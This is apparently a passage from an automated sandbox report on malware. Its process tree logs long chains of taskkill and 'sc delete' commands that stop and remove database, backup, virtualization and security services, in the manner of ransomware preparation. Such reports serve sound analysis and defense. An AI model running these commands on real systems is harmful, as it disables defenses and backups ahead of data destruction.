Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F & @taskkill /IM QQprotect.exe /F & @taskkill /IM isqlplussvc.exe /F & @taskkill /IM nmesrvc.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM jusched.exe /F & @taskkill /IM MtxHotPlugService.exe /F & @taskkill /IM jucheck.exe /F & @taskkill /IM wordpad.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM chrome.exe /F & @taskkill /IM Thunder.exe /F"
3⤵
PID:864

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM sqlservr.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2368

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM httpd.exe /F
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2776

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM java.exe /F
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2924

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM fdhost.exe /F
4⤵
PID:2464

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM fdlauncher.exe /F
4⤵
PID:2440

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM reportingservicesservice.exe /F
4⤵
PID:2452

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM softmgrlite.exe /F
4⤵
PID:2856

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM sqlbrowser.exe /F
4⤵
PID:2308

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM ssms.exe /F
4⤵
PID:2444

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM vmtoolsd.exe /F
4⤵
PID:2100

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM baidunetdisk.exe /F
4⤵
PID:2400

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASLicenceServer
5⤵
PID:2316

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM yundetectservice.exe /F
4⤵
PID:2284

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM ssclient.exe /F
4⤵
PID:2900

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM GNAupdaemon.exe /F
4⤵
- Kills process with taskkill
PID:2916

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM RAVCp164.exe /F
4⤵
PID:2288

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM igfxEM.exe /F
4⤵
PID:2532

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM igfxHK.exe /F
4⤵
- Kills process with taskkill
PID:2612

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM igfxTray.exe /F
4⤵
PID:2796

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM 360bdoctor.exe /F
4⤵
PID:2844

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM GNCEFExternal.exe /F
4⤵
PID:228

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM PrivacyIconClient.exe /F
4⤵
PID:2316

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM UIODetect.exe /F
4⤵
PID:2556

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM AutoDealService.exe /F
4⤵
PID:2860

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM IDDAService.exe /F
4⤵
PID:2356

C:\Windows\SysWOW64\cmd.exe
cmd /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDATAMCU & @sc delete RTCCDR & @sc delete ProjectEventService16 & @sc delete ProjectQueueService16 & @sc delete SPAdminV4 & @sc delete SPSearchHostController & @sc delete SPTimerV4 & @sc delete SPTraceV4 & @sc delete OSearch16 & @sc delete ProjectCalcService16 & @sc delete c2wts & @sc delete AppFabricCachingService & @sc delete ADWS & @sc delete MotionBoard57 & @sc delete MotionBoardRCService57 & @sc delete vsvnjobsvc & @sc delete VisualSVNServer & @sc delete "FlexNet Licensing Service 64" & @sc delete BestSyncSvc & @sc delete LPManager & @sc delete MediatekRegistryWriter & @sc delete RaAutoInstSrv_RT2870 & @sc delete CobianBackup10 & @sc delete SQLANYs_sem5 & @sc delete CASLicenceServer & @sc delete SQLService & @sc delete semwebsrv & @sc delete TbossSystem & @sc delete ErpEnvSvc & @sc delete Mysoft.Autoupgrade.DispatchService & @sc delete Mysoft.Autoupgrade.UpdateService & @sc delete Mysoft.Config.WindowsService & @sc delete Mysoft.DataCenterService & @sc delete Mysoft.SchedulingService & @sc delete Mysoft.Setup.InstallService & @sc delete MysoftUpdate & @sc delete edr_monitor & @sc delete abs_deployer & @sc delete savsvc & @sc delete ShareBoxMonitorService & @sc delete ShareBoxService & @sc delete CloudExchangeService & @sc delete "U8WorkerService2" & @sc delete CIS & @sc delete EASService & @sc delete KICkSvr & @sc delete "OSP Service" & @sc delete U8SmsSrv & @sc delete OfficeClearCache & @sc delete TurboCRM70 & @sc delete U8DispatchService & @sc delete U8EISService & @sc delete U8EncryptService & @sc delete U8GCService & @sc delete U8KeyManagePool & @sc delete "U8MPool" & @sc delete U8SCMPool & @sc delete U8SLReportService & @sc delete U8TaskService & @sc delete "U8WebPool" & @sc delete UFAllNet & @sc delete UFReportService & @sc delete UTUService & @sc delete "U8WorkerService1""
3⤵
PID:1156

C:\Windows\SysWOW64\sc.exe
sc delete MSCRMAsyncService
4⤵
PID:2296

C:\Windows\SysWOW64\sc.exe
sc delete REPLICA
4⤵
PID:2392

C:\Windows\SysWOW64\sc.exe
sc delete RTCATS
4⤵
PID:2564

C:\Windows\SysWOW64\sc.exe
sc delete RTCAVMCU
4⤵
PID:3056

C:\Windows\SysWOW64\sc.exe
sc delete RtcQms
4⤵
PID:2212

C:\Windows\SysWOW64\sc.exe
sc delete RTCMEETINGMCU
4⤵
PID:2196

C:\Windows\SysWOW64\sc.exe
sc delete RTCIMMCU
4⤵
PID:3056

C:\Windows\SysWOW64\sc.exe
sc delete RTCDATAMCU
4⤵
PID:2392

C:\Windows\SysWOW64\sc.exe
sc delete RTCCDR
4⤵
- Launches sc.exe
PID:2448

C:\Windows\SysWOW64\sc.exe
sc delete ProjectEventService16
4⤵
PID:2808

C:\Windows\SysWOW64\sc.exe
sc delete ProjectQueueService16
4⤵
PID:940

C:\Windows\SysWOW64\sc.exe
sc delete SPAdminV4
4⤵
PID:2608

C:\Windows\SysWOW64\sc.exe
sc delete SPSearchHostController
4⤵
PID:2452

C:\Windows\SysWOW64\sc.exe
sc delete SPTimerV4
4⤵
- Launches sc.exe
PID:2560

C:\Windows\SysWOW64\sc.exe
sc delete SPTraceV4
4⤵
PID:2576

C:\Windows\SysWOW64\sc.exe
sc delete OSearch16
4⤵
PID:2960

C:\Windows\SysWOW64\sc.exe
sc delete ProjectCalcService16
4⤵
PID:2484

C:\Windows\SysWOW64\sc.exe
sc delete c2wts
4⤵
PID:2952

C:\Windows\SysWOW64\sc.exe
sc delete AppFabricCachingService
4⤵
- Launches sc.exe
PID:212

C:\Windows\SysWOW64\sc.exe
sc delete ADWS
4⤵
PID:2216

C:\Windows\SysWOW64\sc.exe
sc delete MotionBoard57
4⤵
PID:644

C:\Windows\SysWOW64\sc.exe
sc delete MotionBoardRCService57
4⤵
PID:2984

C:\Windows\SysWOW64\sc.exe
sc delete vsvnjobsvc
4⤵
PID:2792

C:\Windows\SysWOW64\sc.exe
sc delete VisualSVNServer
4⤵
PID:2280

C:\Windows\SysWOW64\sc.exe
sc delete "FlexNet Licensing Service 64"
4⤵
- Launches sc.exe
PID:2104

C:\Windows\SysWOW64\sc.exe
sc delete BestSyncSvc
4⤵
PID:2324

C:\Windows\SysWOW64\sc.exe
sc delete LPManager
4⤵
PID:880

C:\Windows\SysWOW64\sc.exe
sc delete MediatekRegistryWriter
4⤵
PID:2636

C:\Windows\SysWOW64\sc.exe
sc delete RaAutoInstSrv_RT2870
4⤵
PID:2248

C:\Windows\SysWOW64\cmd.exe
cmd /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc delete GPSLoginSvr & @sc delete GPSTomcat6 & @sc delete GPSMysqld & @sc delete GPSFtpd & @sc delete "Zabbix Agent" & @sc delete BackupExecAgentAccelerator & @sc delete bedbg & @sc delete BackupExecDeviceMediaService & @sc delete BackupExecRPCService & @sc delete BackupExecAgentBrowser & @sc delete BackupExecJobEngine & @sc delete BackupExecManagementService & @sc delete MDM & @sc delete TxQBService & @sc delete Gailun_Downloader & @sc delete RemoteAssistService & @sc delete YunService & @sc delete Serv-U & @sc delete "EasyFZS Server" & @sc delete "Rpc Monitor" & @sc delete OpenFastAssist & @sc delete "Nuo Update Monitor" & @sc delete "Daemon Service" & @sc delete asComSvc & @sc delete OfficeUpdateService & @sc delete RtcSrv & @sc delete RTCASMCU & @sc delete FTA & @sc delete MASTER & @sc delete NscAuthService & @sc delete MSCRMUnzipService & @sc delete MSCRMAsyncService$maintenance"
3⤵
PID:1768

C:\Windows\SysWOW64\sc.exe
sc delete "UWS LoPriv Services"
4⤵
PID:2080

C:\Windows\SysWOW64\sc.exe
sc delete ftnlsv3
4⤵
PID:2108

C:\Windows\SysWOW64\sc.exe
sc delete ftnlses3
4⤵
PID:2120

C:\Windows\SysWOW64\sc.exe
sc delete FxService
4⤵
PID:2144

C:\Windows\SysWOW64\sc.exe
sc delete "UtilDev Web Server Pro"
4⤵
PID:2200

C:\Windows\SysWOW64\sc.exe
sc delete ftusbrdwks
4⤵
- Launches sc.exe
PID:2256

C:\Windows\SysWOW64\sc.exe
sc delete ftusbrdsrv
4⤵
PID:2340

C:\Windows\SysWOW64\sc.exe
sc delete "ZTE USBIP Client Guard"
4⤵
PID:2452

C:\Windows\SysWOW64\sc.exe
sc delete "ZTE USBIP Client"
4⤵
PID:2960

C:\Windows\SysWOW64\sc.exe
sc delete "ZTE FileTranS"
4⤵
PID:1272

C:\Windows\SysWOW64\sc.exe
sc delete wwbizsrv
4⤵
PID:2164

C:\Windows\SysWOW64\sc.exe
sc delete qemu-ga
4⤵
PID:2412

C:\Windows\SysWOW64\sc.exe
sc delete AlibabaProtect
4⤵
PID:2772

C:\Windows\SysWOW64\sc.exe
sc delete ZTEVdservice
4⤵
PID:2764

C:\Windows\SysWOW64\sc.exe
sc delete kbasesrv
4⤵
PID:2256

C:\Windows\SysWOW64\sc.exe
sc delete MMRHookService
4⤵
PID:2596

C:\Windows\SysWOW64\sc.exe
sc delete OracleJobSchedulerORCL
4⤵
PID:2812

C:\Windows\SysWOW64\sc.exe
sc delete IpOverUsbSvc
4⤵
PID:2220

C:\Windows\SysWOW64\sc.exe
sc delete MsDtsServer100
4⤵
PID:3056

C:\Windows\SysWOW64\sc.exe
sc delete KuaiYunTools
4⤵
PID:2308

C:\Windows\SysWOW64\sc.exe
sc delete KMSELDI
4⤵
PID:3036

C:\Windows\SysWOW64\sc.exe
sc delete btPanel
4⤵
PID:2884

C:\Windows\SysWOW64\sc.exe
sc delete Protect_2345Explorer
4⤵
PID:232

C:\Windows\SysWOW64\sc.exe
sc delete 2345PicSvc
4⤵
PID:1584

C:\Windows\SysWOW64\sc.exe
sc delete vmware-converter-agent
4⤵
PID:2908

C:\Windows\SysWOW64\sc.exe
sc delete vmware-converter-server
4⤵
- Launches sc.exe
PID:2572

C:\Windows\SysWOW64\sc.exe
sc delete vmware-converter-worker
4⤵
- Launches sc.exe
PID:2144

C:\Windows\SysWOW64\sc.exe
sc delete QQCertificateService
4⤵
PID:1524

C:\Windows\SysWOW64\sc.exe
sc delete OracleRemExecService
4⤵
PID:2628

C:\Windows\SysWOW64\sc.exe
sc delete GPSDaemon
4⤵
- Launches sc.exe
PID:3036

C:\Windows\SysWOW64\sc.exe
sc delete GPSUserSvr
4⤵
PID:644

C:\Windows\SysWOW64\sc.exe
sc delete GPSDownSvr
4⤵
PID:2528

C:\Windows\SysWOW64\sc.exe
sc delete GPSStorageSvr
4⤵
PID:2812

C:\Windows\SysWOW64\sc.exe
sc delete GPSDataProcSvr
4⤵
PID:2748

C:\Windows\SysWOW64\sc.exe
sc delete GPSGatewaySvr
4⤵
PID:2144

C:\Windows\SysWOW64\sc.exe
sc delete GPSMediaSvr
4⤵
PID:2236

C:\Windows\SysWOW64\sc.exe
sc delete GPSLoginSvr
4⤵
PID:1924

C:\Windows\SysWOW64\sc.exe
sc delete GPSTomcat6
4⤵
PID:2768

C:\Windows\SysWOW64\sc.exe
sc delete GPSMysqld
4⤵
PID:2320

C:\Windows\SysWOW64\sc.exe
sc delete GPSFtpd
4⤵
PID:2564

C:\Windows\SysWOW64\sc.exe
sc delete "Zabbix Agent"
4⤵
PID:3016

C:\Windows\SysWOW64\sc.exe
sc delete BackupExecAgentAccelerator
4⤵
PID:1424

C:\Windows\SysWOW64\sc.exe
sc delete bedbg
4⤵
PID:2532

C:\Windows\SysWOW64\sc.exe
sc delete BackupExecDeviceMediaService
4⤵
PID:568

C:\Windows\SysWOW64\sc.exe
sc delete BackupExecRPCService
4⤵
PID:2504

C:\Windows\SysWOW64\sc.exe
sc delete BackupExecAgentBrowser
4⤵
PID:2784

C:\Windows\SysWOW64\sc.exe
sc delete BackupExecJobEngine
4⤵
PID:2772

C:\Windows\SysWOW64\sc.exe
sc delete BackupExecManagementService
4⤵
PID:236

C:\Windows\SysWOW64\sc.exe
sc delete MDM
4⤵
PID:2256

C:\Windows\SysWOW64\sc.exe
sc delete TxQBService
4⤵
PID:2592

C:\Windows\SysWOW64\sc.exe
sc delete Gailun_Downloader
4⤵
PID:2632

C:\Windows\SysWOW64\cmd.exe
cmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"
3⤵
PID:1028

C:\Windows\SysWOW64\sc.exe
sc delete EnergyDataService
4⤵
PID:660

C:\Windows\SysWOW64\sc.exe
sc delete UI0Detect
4⤵
PID:2020

C:\Windows\SysWOW64\sc.exe
sc delete K3MobileService
4⤵
PID:1320

C:\Windows\SysWOW64\sc.exe
sc delete TCPIDDAService
4⤵
- Launches sc.exe
PID:2056

C:\Windows\SysWOW64\sc.exe
sc delete WebAttendServer
4⤵
PID:2128

C:\Windows\SysWOW64\sc.exe
sc delete UIODetect
4⤵
PID:2160

C:\Windows\SysWOW64\sc.exe
sc delete "wanxiao-monitor"
4⤵
PID:2212

C:\Windows\SysWOW64\sc.exe
sc delete VMAuthdService
4⤵
PID:2356

C:\Windows\SysWOW64\sc.exe
sc delete VMUSBArbService
4⤵
PID:2444

C:\Windows\SysWOW64\sc.exe
sc delete "vm-agent"
4⤵
PID:1544

C:\Windows\SysWOW64\sc.exe
sc delete VMwareHostd
4⤵
PID:2996

C:\Windows\SysWOW64\sc.exe
sc delete VmAgentDaemon
4⤵
PID:2120

C:\Windows\SysWOW64\sc.exe
sc delete OpenSSHd
4⤵
PID:2228

C:\Windows\SysWOW64\sc.exe
sc delete eSightService
4⤵
PID:2252

C:\Windows\SysWOW64\sc.exe
sc delete apachezt
4⤵
PID:2608

C:\Windows\SysWOW64\sc.exe
sc delete Jenkins
4⤵
PID:2552

C:\Windows\SysWOW64\sc.exe
sc delete secbizsrv
4⤵
- Launches sc.exe
PID:3048

C:\Windows\SysWOW64\sc.exe
sc delete SQLTELEMETRY
4⤵
PID:2216

C:\Windows\SysWOW64\sc.exe
sc delete MSMQ
4⤵
PID:2876

C:\Windows\SysWOW64\sc.exe
sc delete smtpsvrJT
4⤵
PID:2484

C:\Windows\SysWOW64\sc.exe
sc delete zyb_sync
4⤵
PID:2864

C:\Windows\SysWOW64\sc.exe
sc delete 360EntHttpServer
4⤵
PID:2968

C:\Windows\SysWOW64\sc.exe
sc delete 360EntSvc
4⤵
PID:2104

C:\Windows\SysWOW64\sc.exe
sc delete 360EntClientSvc
4⤵
- Launches sc.exe
PID:2480

C:\Windows\SysWOW64\sc.exe
sc delete NFWebServer
4⤵
PID:2960

C:\Windows\SysWOW64\sc.exe
sc delete wampapache
4⤵
PID:2992

C:\Windows\SysWOW64\sc.exe
sc delete MSSEARCH
4⤵
PID:2832

C:\Windows\SysWOW64\sc.exe
sc delete msftesql
4⤵
PID:1272

C:\Windows\SysWOW64\sc.exe
sc delete "SyncBASE Service"
4⤵
PID:2328

C:\Windows\SysWOW64\sc.exe
sc delete OracleDBConcoleorcl
4⤵
PID:2352

C:\Windows\SysWOW64\sc.exe
sc delete OracleJobSchedulerORCL
4⤵
PID:1924

C:\Windows\SysWOW64\sc.exe
sc delete OracleMTSRecoveryService
4⤵
PID:2724

C:\Windows\SysWOW64\cmd.exe
cmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F"
3⤵
PID:1800

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM ThunderPlatform.exe /F
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2380

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM iexplore.exe /F
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2768

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM vm-agent.exe /F
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2892

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM vm-agent-daemon.exe /F
4⤵
PID:2724

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM eSightService.exe /F
4⤵
PID:2740

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM cygrunsrv.exe /F
4⤵
PID:2940

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM wrapper.exe /F
4⤵
PID:2532

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM nginx.exe /F
4⤵
PID:2120

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM node.exe /F
4⤵
PID:2796

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM sshd.exe /F
4⤵
PID:2256

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM vm-tray.exe /F
4⤵
PID:2528

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM iempwatchdog.exe /F
4⤵
PID:2136

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM sqlwriter.exe /F
4⤵
PID:2928

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM php.exe /F
4⤵
PID:2516

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM "notepad++.exe" /F
4⤵
PID:2708

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM "phpStudy.exe" /F
4⤵
PID:2784

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM OPCClient.exe /F
4⤵
PID:3048

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM navicat.exe /F
4⤵
PID:2976

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM SupportAssistAgent.exe /F
4⤵
PID:2236

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM SunloginClient.exe /F
4⤵
PID:996

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM SOUNDMAN.exe /F
4⤵
- Kills process with taskkill
PID:3000

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM WeChat.exe /F
4⤵
PID:680

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM TXPlatform.exe /F
4⤵
- Kills process with taskkill
PID:2988

C:\Windows\SysWOW64\cmd.exe
cmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM 